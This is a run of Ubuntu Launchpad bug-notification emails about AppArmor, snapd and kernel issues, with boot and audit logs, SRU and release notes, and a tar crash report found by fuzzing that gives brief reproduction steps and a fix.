https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Also affects: snapd (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: New Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: New Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Also affects: apparmor (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: apparmor (Ubuntu Bionic) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in apparmor source package in Xenial: New Status in apparmor source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] [NEW] apparmor.service tries to load snapd generated apparmor profiles but fails
Public bug reported: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug bionic ** Description changed: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. - In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor - profiles generated by snapd as since snapd 2.44.3 it has shipped the - snapd.apparmor.service unit which loads its apparmor profiles on boot. + This is seen as a failure to load the apparmor.service at boot once this + new snapd snap with the vendored apparmor is installed: + + root@sec-bionic-amd64:~# systemctl status apparmor + ● apparmor.service - AppArmor initialization +Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) +Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago + Docs: man:apparmor(7) +http://wiki.apparmor.net/ + Main PID: 1590 (code=exited, status=123) + + Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. + Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable:
[Touch-packages] [Bug 1899218] Re: Incorrect warning from apparmor_parser on force complained profiles
This bug is fixed and the behaviour you are seeing is expected - ie. it is expected that AppArmor prints a warning about forcing complain mode for the usr.sbin.sssd profile and that it then also prints a warning about caching being disabled for that due to it being in force complain mode. This is expected and normal behaviour. However, if you feel this expected behaviour is a bug, please file a separate bug report for that and describe what you think is incorrect about this behaviour and how instead you feel it should behave. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1899218 Title: Incorrect warning from apparmor_parser on force complained profiles Status in apparmor package in Ubuntu: Fix Released Bug description: apparmor_parser on a force complained profile produces an incorrect warning message: $ sudo apparmor_parser -rW /etc/apparmor.d/usr.sbin.sssd Warning: found usr.sbin.sssd in /etc/apparmor.d/force-complain, forcing complain mode Warning from /etc/apparmor.d/usr.sbin.sssd (/etc/apparmor.d/usr.sbin.sssd line 54): Warning failed to create cache: usr.sbin.sssd Even though not generating the cache at all is expected, the warning should describe caching is disabled for force complained profiles instead of failure to create it. $ lsb_release -rd Description: Ubuntu Groovy Gorilla (development branch) Release: 20.10 $ apt-cache policy apparmor apparmor: Installed: 3.0.0~beta1-0ubuntu6 Candidate: 3.0.0~beta1-0ubuntu6 Version table: *** 3.0.0~beta1-0ubuntu6 500 500 http://archive.ubuntu.com/ubuntu groovy/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1899218/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1994146] Re: [SRU] apparmor - Focal, Jammy
These have now been uploaded to -proposed and are sitting in UNAPPROVED: https://launchpad.net/ubuntu/jammy/+queue?queue_state=1_text=apparmor https://launchpad.net/ubuntu/focal/+queue?queue_state=1_text=apparmor ** Changed in: apparmor (Ubuntu Focal) Status: Confirmed => In Progress ** Changed in: apparmor (Ubuntu Jammy) Status: Confirmed => In Progress -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1994146 Title: [SRU] apparmor - Focal, Jammy Status in apparmor package in Ubuntu: Confirmed Status in apparmor source package in Focal: In Progress Status in apparmor source package in Jammy: In Progress Bug description: [ Impact ] This is a SRU proposal for apparmor in Focal and Jammy. For focal, we want to SRU fixes for Bug 1964636 which introduces the capability upstream patches. We are also fixing Bug 1728130 and Bug 1993353 which are introducing full backport of abi from apparmor-3.0 and support for POSIX message queue rules, which are both a request from Honeywell. Note that specifically for message queue rules, we are overriding the abi behavior. Message queue mediation is not a part of the 2.13 abi we are pinning. Honeywell has a kernel that has message queue mediation, but their policy does not contain an abi specified, so when we pin the abi for a kernel that does not mediate message queue, it will break Honeywell's AppArmor policies. So we are making an exception: when abi is not specified in the policy, and the policy contain mqueue rules, we are enforcing mqueue rules. When the policy does not contain mqueue rules, then they are not being enforced. This is so we do not break Honeywell policies and we also are not breaking policies that were developed when there was no mqueue or abi support. For jammy, we are SRUing fixes for Bug 1993353 which adds message queue rules support. [ Test Plan ] This has been extensively tested by using QA Regression Tests[1] for AppArmor. All tests have passed and demonstrated AppArmor to be working as expected. We are also adding regression tests for message queue rules[2] which guarantees it is working as expected. [1] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py [2] https://gitlab.com/apparmor/apparmor/-/merge_requests/858 [ Where problems could occur ] The message queue rules support could cause issues for AppArmor policies that were developed before there was support for mqueues, that's why we are also backporting abi support and pinning the abi on parser.conf on focal. Jammy already has the abi pinned for a kernel that does not have support for mqueue mediation. [ Other Info ] The patches for both focal and jammy can be found at: https://launchpad.net/~georgiag/+archive/ubuntu/mqueue-sru/ To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1994146/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1992930] Re: chromium won't launch at menu when installed; lubuntu kinetic
This current bug looks like LP: #1991691 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1992930 Title: chromium won't launch at menu when installed; lubuntu kinetic Status in apparmor package in Ubuntu: New Bug description: Lubuntu kinetic live test `chromium` snap once installed; will not open from menu, but will open if started from terminal. This maybe filed against incorrect package sorry. Originally reported here - https://discourse.lubuntu.me/t/lubuntu- kinetic-after-5-19-update-chromium-only-start-from-terminal/3685 where it was reported as an issue on the 5.19.0-19-generic kernel update ** to re-create - boot currently lubuntu kinetic daily - snap install chromium - using menu, attempt to run chromium from internet apps ** expected outcome chromium starts ** actual outcome menu just closes; no messages. ** further notes u/FossFreedom (Ubuntu Budgie) reports no issues with Ubuntu Budgie kinetic starting Chromium. On Lubuntu's discourse; u/neblaz (OP for issue) also reported issues starting Opera; with that package being the snap (loaded from discover) and reported as (using `snap list`) opera 91.0.4516.77202 latest/stable ** in `dmesg` I note the following (this may be unrelated or unhelpful sorry) [ 1510.255228] loop7: detected capacity change from 0 to 293648 [ 1510.739240] audit: type=1400 audit(1665727470.633:54): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap-update-ns.chromium" pid=3359 comm="apparmor_parser" [ 1510.820094] audit: type=1400 audit(1665727470.713:55): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.chromedriver" pid=3360 comm="apparmor_parser" [ 1511.014103] audit: type=1400 audit(1665727470.909:56): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.chromium" pid=3361 comm="apparmor_parser" [ 1511.071575] audit: type=1400 audit(1665727470.965:57): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.hook.configure" pid=3362 comm="apparmor_parser" [ 1515.313383] audit: type=1400 audit(1665727475.206:58): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/snap/snapd/17029/usr/lib/snapd/snap-confine" pid=3496 comm="apparmor_parser" [ 1515.313401] audit: type=1400 audit(1665727475.206:59): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/snap/snapd/17029/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=3496 comm="apparmor_parser" [ 1516.817149] audit: type=1400 audit(1665727476.710:60): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.chromium" pid=3498 comm="apparmor_parser" [ 1518.067335] audit: type=1400 audit(1665727477.962:61): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromedriver" pid=3499 comm="apparmor_parser" [ 1518.568962] audit: type=1400 audit(1665727478.462:62): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.hook.configure" pid=3501 comm="apparmor_parser" [ 1519.485025] audit: type=1400 audit(1665727479.378:63): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromium" pid=3500 comm="apparmor_parser" [ 1520.203518] audit: type=1400 audit(1665727480.098:64): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/meta/snap.yaml" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 1520.245234] audit: type=1400 audit(1665727480.142:65): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/usr/local/share/fonts/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 1520.245256] audit: type=1400 audit(1665727480.142:66): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/usr/local/share/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 1520.246876] audit: type=1400 audit(1665727480.142:67): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/var/lib/snapd/hostfs/usr/share/doc/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 1520.246933] audit: type=1400 audit(1665727480.142:68): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/var/lib/snapd/hostfs/usr/share/fonts/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 1520.349971] audit: type=1400 audit(1665727480.246:69): apparmor="DENIED" operation="getattr" class="file"
[Touch-packages] [Bug 1992580] Re: i915 DG1 fails to load
*** This bug is a duplicate of bug 1991704 *** https://bugs.launchpad.net/bugs/1991704 ** This bug has been marked a duplicate of bug 1991704 Kinetic kernels 5.19.0-18/19-generic won't boot on Intel 11th/12th gen -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/1992580 Title: i915 DG1 fails to load Status in initramfs-tools package in Ubuntu: New Status in linux package in Ubuntu: Confirmed Bug description: On kernel 5.19 in Ubuntu Jammy i915 fails to initialize Intel DG1 GPU --- ProblemType: Bug ApportVersion: 2.23.1-0ubuntu2 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME DistroRelease: Ubuntu 22.10 InstallationDate: Installed on 2020-12-06 (674 days ago) InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Release amd64 (20201022) Package: linux PackageArchitecture: all ProcVersionSignature: Ubuntu 5.19.0-19.19-generic 5.19.7 Tags: wayland-session kinetic Uname: Linux 5.19.0-19-generic x86_64 UpgradeStatus: Upgraded to kinetic on 2022-09-19 (22 days ago) UserGroups: adm cdrom dip docker libvirt lpadmin lxd plugdev sambashare sudo wireshark _MarkForUpload: True To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1992580/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1992430] Re: Snap based apps crash after 5.19.0-18->5.19.0-19 kernel upgrade
*** This bug is a duplicate of bug 1991691 *** https://bugs.launchpad.net/bugs/1991691 ** This bug has been marked a duplicate of bug 1991691 cannot change mount namespace -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1992430 Title: Snap based apps crash after 5.19.0-18->5.19.0-19 kernel upgrade Status in apparmor package in Ubuntu: New Bug description: This occurs on Ubuntu ver. 22.10. Here is an example: skype update.go:85: cannot change mount namespace according to change mount (/run/user/1000/doc/by-app/snap.skype /run/user/1000/doc none bind,rw,x-snapd.ignore-missing 0 0): cannot inspect "/run/user/1000/doc": lstat /run/user/1000/doc: permission denied + [ -f /home/user/snap/skype/common/.config/skypeforlinux/settings.json ] + export SKYPE_LOGS=/home/user/snap/skype/231/logs + [ ! -d /home/user/snap/skype/231/logs ] + exec /snap/skype/231/usr/share/skypeforlinux/skypeforlinux (skypeforlinux:9439): Gtk-WARNING **: 10:13:12.251: Theme parsing error: gtk.css:3536:25: 'font-feature-settings' is not a valid property name Gtk-Message: 10:13:12.294: Failed to load module "colorreload-gtk-module" Gtk-Message: 10:13:12.295: Failed to load module "window-decorations-gtk-module" [1011/101312.442717:ERROR:scoped_ptrace_attach.cc(27)] ptrace: Permission denied (13) Nyomkövetési/töréspont csapda (core készült) Google translation: Trace/breakpoint trap (core made) Here is an another one: teams update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): cannot inspect "/var/lib/snapd/hostfs/usr/share/fonts": lstat /var/lib/snapd/hostfs/usr/share/fonts: permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): cannot inspect "/usr/local/share/fonts": lstat /usr/local/share/fonts: permission denied update.go:85: cannot change mount namespace according to change mount (/run/user/1000/doc/by-app/snap.teams /run/user/1000/doc none bind,rw,x-snapd.ignore-missing 0 0): cannot inspect "/run/user/1000/doc": lstat /run/user/1000/doc: permission denied Loading of the previous kernel fixes the issue this is why I think it could be kernel-related or something like that. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1992430/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1810241] Re: NULL dereference when decompressing specially crafted archives
Thanks I have updated the status of this CVE in the Ubuntu CVE tracker. ** Changed in: tar (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tar in Ubuntu. https://bugs.launchpad.net/bugs/1810241 Title: NULL dereference when decompressing specially crafted archives Status in tar package in Ubuntu: Fix Released Bug description: Hi, Fuzzing tar with checksums disabled reveals a NULL pointer dereference when parsing certain archives that have malformed extended headers. This affects tar from (at least) Trusty, Bionic and Cosmic. I haven't tested Xenial's version. A test case with fixed checksums is attached. To avoid breaking anything that looks inside tar archives, I have converted it to text with xxd. To reproduce: $ xxd -r gnutar-crash.tar.txt gnutar-crash.tar $ tar Oxf gnutar-crash.tar tar: Ignoring unknown extended header keyword 'GNU.sparse.minTr' tar: Malformed extended header: missing length Segmentation fault (core dumped) I have also attached a patch against the latest upstream git and against 1.30 (in Cosmic). This fixes the issue by detecting the null result before it is dereferenced. Regards, Daniel To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1989309] Re: [FFe] apparmor 3.1.1 upstream release
** Description changed: - Placeholder for preparation of AppArmor 3.1.1 for kinetic. + AppArmor 3.1.1 is the latest upstream version of the apparmor userspace + tooling. + + This includes a large number of bug fixes since the 3.0.7 release which + is currently in kinetic, as well as various cleanups and optimisations + to the different tools to improve performance and maintainability. + + The full ChangeLog can be seen at [1] + + + TESTING + + This has been extensively tested by the security team - this includes + following the documented Ubuntu merges test plan[2] for AppArmor and the + extensive QA Regression Tests[3] for AppArmor as well. This ensures that + the various applications that make heavy use of AppArmor (LXD, docker, + lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions + have been observed. All tests have passed and demonstrated both apparmor + and the various applications that use it to be working as expected. + + + BUILD LOGS + + This is currently uploaded to https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309, build logs can be found on + Launchpad at: + https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+build/24491969 for amd64 etc + + + DEBDIFF + + The debdiff can be found in the PPA: + https://launchpad.net/~alexmurray/+archive/ubuntu/lp1989309/+files/apparmor_3.0.7-1ubuntu1_3.1.1-0ubuntu1.diff.gz + + + INSTALL / UPGRADE LOG + + The apt upgrade log is attached. + + + [1] https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.1 + [2] https://wiki.ubuntu.com/Process/Merges/TestPlans/AppArmor + [3] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py ** Attachment added: "apparmor-3.1.1-0ubuntu1-apt-upgrade.log" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1989309/+attachment/5617638/+files/apparmor-3.1.1-0ubuntu1-apt-upgrade.log ** Description changed: AppArmor 3.1.1 is the latest upstream version of the apparmor userspace tooling. This includes a large number of bug fixes since the 3.0.7 release which is currently in kinetic, as well as various cleanups and optimisations to the different tools to improve performance and maintainability. The full ChangeLog can be seen at [1] - TESTING This has been extensively tested by the security team - this includes following the documented Ubuntu merges test plan[2] for AppArmor and the extensive QA Regression Tests[3] for AppArmor as well. This ensures that - the various applications that make heavy use of AppArmor (LXD, docker, - lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions - have been observed. All tests have passed and demonstrated both apparmor + the various applications that make heavy use of AppArmor (LXD, docker, + lxc, dbus, libvirt, snapd etc) have all been exercised and no regressions + have been observed. All tests have passed and demonstrated both apparmor and the various applications that use it to be working as expected. - BUILD 